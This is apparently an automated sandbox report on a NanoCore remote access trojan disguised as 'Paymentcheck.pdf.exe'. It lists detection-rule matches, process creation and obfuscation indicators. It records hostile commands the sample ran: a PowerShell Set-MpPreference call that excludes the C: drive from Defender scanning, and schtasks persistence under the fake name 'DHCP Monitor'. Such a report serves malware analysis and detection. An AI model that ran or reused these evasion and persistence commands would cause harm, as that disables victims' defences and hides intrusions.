Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.933970922.0000000003AAE000.00000004.00000001.sdmp | type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp | type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp | type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp | type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp | type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp | type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736 | type: MEMORYSTR | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736 | type: MEMORYSTR | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 6732 | type: MEMORYSTR | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 6732 | type: MEMORYSTR | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Paymentcheck.pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: msbuildd.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.evad.winEXE@20/21@0/1
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File created: C:\Program Files (x86)\DHCP Monitor
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1088:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2340:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{bcd083ef-bf90-4541-bf76-579f377e7cee}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5584:120:WilError_01
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | File created: C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | File read: C:\Users\user\Desktop\Paymentcheck.pdf.exe
Source: unknown | Process created: C:\Users\user\Desktop\Paymentcheck.pdf.exe 'C:\Users\user\Desktop\Paymentcheck.pdf.exe'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp'
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Paymentcheck.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Paymentcheck.pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegAsm.pdb | source: RegAsm.exe, dhcpmon.exe, dhcpmon.exe, 00000019.00000000.859072816.0000000000DF2000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb | source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: RegAsm.pdb4 | source: RegAsm.exe, 0000000D.00000000.820068225.00000000004A2000.00000002.00020000.sdmp, RegAsm.exe, 00000012.00000000.835793431.0000000000992000.00000002.00020000.sdmp, dhcpmon.exe, 00000016.00000002.844182498.0000000000E62000.00000002.00020000.sdmp, dhcpmon.exe, 00000019.00000000.859072816.0000000000DF2000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb | source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb | source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb | source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb | source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb | source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: Paymentcheck.pdf.exe, Hhqpifkcellhsdlnziy.Dictionaries/TokenInfoDic.cs | .Net Code: InitDescriptor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: msbuildd.exe.0.dr, Hhqpifkcellhsdlnziy.Dictionaries/TokenInfoDic.cs | .Net Code: InitDescriptor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Paymentcheck.pdf.exe.660000.0.unpack, Hhqpifkcellhsdlnziy.Dictionaries/TokenInfoDic.cs | .Net Code: InitDescriptor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.Paymentcheck.pdf.exe.660000.0.unpack, Hhqpifkcellhsdlnziy.Dictionaries/TokenInfoDic.cs | .Net Code: InitDescriptor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Paymentcheck.pdf.exe | Static PE information: compile timestamp (IMAGE_FILE_HEADER.TimeDateStamp) 0xBB2F66FF [Sun Jul 7 18:05:51 2069 UTC], a date in the future at analysis time
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_006646EC push ss; ret | 0_2_006646F6
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_006646F8 push ss; ret | 0_2_006646FC
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_0066457E push cs; ret | 0_2_00664582
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_00664578 push cs; ret | 0_2_0066457C
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_0066375A push ecx; retf | 0_2_006637C8
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_006645A8 push 0000000Fh; ret | 0_2_006645B2
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_0066458A push cs; ret | 0_2_0066458E
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_00664590 push cs; ret | 0_2_0066459A
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_0793B197 push 5D64812Ch; ret | 0_2_0793B169
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_004A4289 push es; retf | 13_2_004A4294
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_004A4469 push cs; retf | 13_2_004A449E
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_004A44A3 push es; retf | 13_2_004A44A4
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_00ECC200 push ds; iretd | 13_2_00ECC20E
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06192401 push esi; retf 0005h | 13_2_06192402
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06192459 push esi; retf 0005h | 13_2_0619245A
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_061922FF push ebp; retf 0005h | 13_2_06192302
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06192310 push esi; retf 0005h | 13_2_06192352
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06192039 push ebp; retf 0005h | 13_2_0619203A
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_0619305F pushad ; retf 0005h | 13_2_06193062
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_061920D8 push ebp; retf 0005h | 13_2_061920DA
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06192130 push ebp; retf 0005h | 13_2_06192132
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06192189 push ebp; retf 0005h | 13_2_0619218A
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_061921DF push ebp; retf 0005h | 13_2_0619226A
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_061921F0 push ebp; retf 0005h | 13_2_0619226A
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_0619AF76 push 8B000005h; retf | 13_2_0619AF7F
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06191DE0 push esp; retf 0005h | 13_2_06191DE2
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_0619FA78 push esp; retf | 13_2_0619FA79
